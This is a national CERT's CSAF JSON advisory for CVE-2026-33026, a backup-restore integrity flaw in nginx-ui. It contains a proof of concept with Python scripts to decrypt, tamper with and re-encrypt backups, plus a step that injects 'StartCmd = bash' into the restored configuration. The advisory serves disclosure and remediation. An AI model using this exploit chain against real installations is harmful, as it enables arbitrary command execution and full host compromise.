{
"document": {
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "en",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "National Cyber Security Centre",
"namespace": "https://www.ncsc.nl/"
},
"title": "CVE-2026-33026",
"tracking": {
"current_release_date": "2026-04-01T23:20:30.939282Z",
"generator": {
"date": "2026-02-17T15:00:00Z",
"engine": {
"name": "V.E.L.M.A",
"version": "1.7"
}
},
"id": "CVE-2026-33026",
"initial_release_date": "2026-03-30T16:52:58.578235Z",
"revision_history": [
{
"date": "2026-03-30T16:52:58.578235Z",
"number": "1",
"summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
},
{
"date": "2026-03-30T16:53:06.602162Z",
"number": "2",
"summary": "NCSC Score created."
},
{
"date": "2026-03-30T20:26:12.881896Z",
"number": "3",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
},
{
"date": "2026-03-30T20:26:14.414834Z",
"number": "4",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-30T20:38:51.964544Z",
"number": "5",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
},
{
"date": "2026-03-30T20:38:53.413893Z",
"number": "6",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-31T07:35:36.134640Z",
"number": "7",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-31T12:05:46.712293Z",
"number": "8",
"summary": "Source created.| CVE status created. (valid)| Products created (1).| References created (15)."
},
{
"date": "2026-03-31T12:05:53.584296Z",
"number": "9",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-31T15:39:09.797718Z",
"number": "10",
"summary": "Unknown change."
},
{
"date": "2026-03-31T16:58:07.536438Z",
"number": "11",
"summary": "Source connected.| CVE status created. (valid)| EPSS created."
},
{
"date": "2026-03-31T19:55:21.019550Z",
"number": "12",
"summary": "References created (2)."
},
{
"date": "2026-04-01T06:26:58.384235Z",
"number": "13",
"summary": "NCSC Score updated."
},
{
"date": "2026-04-01T22:58:57.310069Z",
"number": "14",
"summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
},
{
"date": "2026-04-01T22:58:59.564106Z",
"number": "15",
"summary": "NCSC Score updated."
}
],
"status": "interim",
"version": "15"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/ui <2.3.4",
"product": {
"name": "vers:unknown/ui <2.3.4",
"product_id": "CSAFPID-5968318"
}
}
],
"category": "product_name",
"name": "NGINX"
}
],
"category": "vendor",
"name": "NGINX"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/<2.3.4",
"product": {
"name": "vers:unknown/<2.3.4",
"product_id": "CSAFPID-5965559"
}
}
],
"category": "product_name",
"name": "nginx-ui"
}
],
"category": "vendor",
"name": "0xJacky"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/<2.3.4",
"product": {
"name": "vers:unknown/<2.3.4",
"product_id": "CSAFPID-5982828",
"product_identification_helper": {
"cpe": "cpe:2.3:a:nginxui:nginx_ui:*:*:*:*:*:*:*:*"
}
}
}
],
"category": "product_name",
"name": "nginx_ui"
}
],
"category": "vendor",
"name": "nginxui"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-33026",
"cwe": {
"id": "CWE-312",
"name": "Cleartext Storage of Sensitive Information"
},
"notes": [
{
"category": "description",
"text": "## Summary\nThe `nginx-ui` backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.\n\n## Details\nThe backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (`hash_info.txt`) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.\n\nBecause the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.\n\nThe backup system is built around the following workflow:\n\n1. Backup files are compressed into `nginx-ui.zip` and `nginx.zip`.\n2. The files are encrypted using AES-256-CBC.\n3. SHA-256 hashes of the encrypted files are stored in `hash_info.txt`.\n4. The hash file is also encrypted with the same AES key and IV.\n5. The AES key and IV are provided to the client as a \"backup security token\".\n\nThis architecture creates a circular trust model:\n\n- The encryption key is available to the client.\n- The integrity metadata is encrypted with that same key.\n- The restore process trusts hashes contained within the backup itself.\n\nBecause the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.\n\n### Environment\n- **OS**: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)\n- **Application Version**: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)\n- **Deployment**: Docker Container default installation\n- **Relevant Source Files**:\n - `backup_crypto.go`\n - `backup.go`\n - `restore.go`\n - `SystemRestoreContent.vue`\n\n\n## PoC\n1. Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the `.key` file.\n ![\"image\"](\"https://github.com/user-attachments/assets/857a1b3f-ce66-4929-a165-2f28393df17f\")
\n\n2. Decrypt the `nginx-ui.zip` archive using the obtained token.\n``` \nimport base64\nimport os\nimport sys\nimport zipfile\nfrom io import BytesIO\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\n\ndef decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -> bytes:\n key = base64.b64decode(key_b64)\n iv = base64.b64decode(iv_b64)\n \n cipher = AES.new(key, AES.MODE_CBC, iv)\n decrypted = cipher.decrypt(encrypted_data)\n return unpad(decrypted, AES.block_size)\n\ndef process_local_backup(file_path, token, output_dir):\n key_b64, iv_b64 = token.split(\":\")\n os.makedirs(output_dir, exist_ok=True)\n print(f\"[*] File processing: {file_path}\")\n \n with zipfile.ZipFile(file_path, 'r') as main_zip:\n main_zip.extractall(output_dir)\n \n files_to_decrypt = [\"hash_info.txt\", \"nginx-ui.zip\", \"nginx.zip\"]\n \n for filename in files_to_decrypt:\n path = os.path.join(output_dir, filename)\n if os.path.exists(path):\n with open(path, \"rb\") as f:\n encrypted = f.read()\n \n decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)\n \n out_path = path + \".decrypted\"\n with open(out_path, \"wb\") as f:\n f.write(decrypted)\n print(f\"[*] Successfully decrypted: {out_path}\")\n\n# Manual config\nBACKUP_FILE = \"backup-20260314-151959.zip\" \nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nOUTPUT = \"decrypted\"\n\nif __name__ == \"__main__\":\n process_local_backup(BACKUP_FILE, TOKEN, OUTPUT)\n```\n\n3. Modify the contained `app.ini` to inject malicious configuration (e.g., `StartCmd = bash`).\n4. Re-compress the files and calculate the new SHA-256 hash.\n5. Update `hash_info.txt` with the new, legitimate-looking hashes for the modified files.\n6. Encrypt the bundle again using the original Key and IV.\n```\nimport base64\nimport hashlib\nimport os\nimport zipfile\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\n\ndef encrypt_file(data, key_b64, iv_b64):\n key = base64.b64decode(key_b64)\n iv = base64.b64decode(iv_b64)\n cipher = AES.new(key, AES.MODE_CBC, iv)\n return cipher.encrypt(pad(data, AES.block_size))\n\ndef build_rebuilt_backup(files, token, output_filename=\"backup_rebuild.zip\"):\n key_b64, iv_b64 = token.split(\":\")\n \n encrypted_blobs = {}\n for fname in files:\n with open(fname, \"rb\") as f:\n data = f.read()\n \n blob = encrypt_file(data, key_b64, iv_b64)\n\n target_name = fname.replace(\".decrypted\", \"\")\n encrypted_blobs[target_name] = blob\n print(f\"[*] Cipher {target_name}: {len(blob)} bytes\")\n\n hash_content = \"\"\n for name, blob in encrypted_blobs.items():\n h = hashlib.sha256(blob).hexdigest()\n hash_content += f\"{name}: {h}\\n\"\n \n encrypted_hash_info = encrypt_file(hash_content.encode(), key_b64, iv_b64)\n encrypted_blobs[\"hash_info.txt\"] = encrypted_hash_info\n\n with zipfile.ZipFile(output_filename, 'w', compression=zipfile.ZIP_DEFLATED) as zf:\n for name, blob in encrypted_blobs.items():\n zf.writestr(name, blob)\n \n print(f\"\\n[*] Backup rebuild: {output_filename}\")\n print(f\"[*] Verificando integridad...\")\n\nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nFILES = [\"nginx-ui.zip.decrypted\", \"nginx.zip.decrypted\"]\n\nif __name__ == \"__main__\":\n build_rebuilt_backup(FILES, TOKEN)\n```\n7. Upload the tampered backup to the `nginx-ui` restore interface.\n ![\"image\"](\"https://github.com/user-attachments/assets/66872685-b85b-4c81-ae24-13c811acba9a\")
\n\n\n8. **Observation**: The system accepts the modified backup. Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host.\n ![\"image\"](\"https://github.com/user-attachments/assets/2752749e-ac39-4d60-88ca-5058b8e840a6\")
\n\n\n\n## Impact\nAn attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.\n\nPotential impacts include:\n\n- Persistent configuration tampering\n- Backdoor insertion into nginx configuration\n- Execution of attacker-controlled commands depending on configuration settings\n- Full compromise of the nginx-ui instance\n\nThe severity depends on the restore permissions and deployment configuration.\n\n## Recommended Mitigation\n\n1. **Introduce a trusted integrity root**\nIntegrity metadata must not be derived solely from data contained in the backup. Possible solutions include:\n - Signing backup metadata using a server-side private key\n - Storing integrity metadata separately from the backup archive\n\n2. **Enforce integrity verification**\nThe restore operation must abort if hash verification fails.\n\n3. **Avoid circular trust models**\nIf encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.\n\n4. **Optional cryptographic improvements**\nWhile not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret.\n\nThis vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.\n\n## Regression\n\nThe previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.\n\nThe backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.\n\nAs a result, the fundamental integrity weakness remains exploitable even after the previous fix.\n\nA patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.",
"title": "github - https://api.github.com/advisories/GHSA-fhh2-gg7w-gwpq"
},
{
"category": "description",
"text": "Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.4, the nginx-ui backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration. This issue has been patched in version 2.3.4.",
"title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33026"
},
{
"category": "description",
"text": "Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.4, the nginx-ui backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration. This issue has been patched in version 2.3.4.",
"title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33026.json"
},
{
"category": "other",
"text": "0.00012",
"title": "EPSS"
},
{
"category": "other",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"title": "CVSSV4"
},
{
"category": "other",
"text": "9.4",
"title": "CVSSV4 base score"
},
{
"category": "other",
"text": "5.2",
"title": "NCSC Score"
},
{
"category": "other",
"text": "There is product data available from source Certbundde",
"title": "NCSC Score top increasing factors"
},
{
"category": "other",
"text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd, Is related to an uncommon product vendor",
"title": "NCSC Score top decreasing factors"
}
],
"product_status": {
"known_affected": [
"CSAFPID-5965559",
"CSAFPID-5968318",
"CSAFPID-5982828"
]
},
"references": [
{
"category": "external",
"summary": "Source - github",
"url": "https://api.github.com/advisories/GHSA-fhh2-gg7w-gwpq"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33026"
},
{
"category": "external",
"summary": "Source - cveprojectv5",
"url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33026.json"
},
{
"category": "external",
"summary": "Source - certbundde",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0931.json"
},
{
"category": "external",
"summary": "Source - first",
"url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd",
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-fhh2-gg7w-gwpq"
},
{
"category": "external",
"summary": "Reference - github",
"url": "https://github.com/advisories/GHSA-g9w5-qffc-6762"
},
{
"category": "external",
"summary": "Reference - certbundde; github",
"url": "https://github.com/advisories/GHSA-fhh2-gg7w-gwpq"
},
{
"category": "external",
"summary": "Reference - certbundde; cveprojectv5; github; nvd",
"url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0931.json"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0931"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17151"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17152"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17154"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17156"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17158"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17194"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://github.com/advisories/GHSA-5hf2-vhj6-gj9m"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://github.com/advisories/GHSA-cp8r-8jvw-v3qg"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://github.com/advisories/GHSA-h6c2-x2m2-mwhf"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://github.com/advisories/GHSA-m468-xcm6-fxg4"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://github.com/advisories/GHSA-m8p8-53vf-8357"
},
{
"category": "external",
"summary": "Reference - github",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33026"
}
],
"scores": [
{
"cvss_v3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
},
"products": [
"CSAFPID-5965559",
"CSAFPID-5968318",
"CSAFPID-5982828"
]
}
],
"title": "CVE-2026-33026"
}
]
}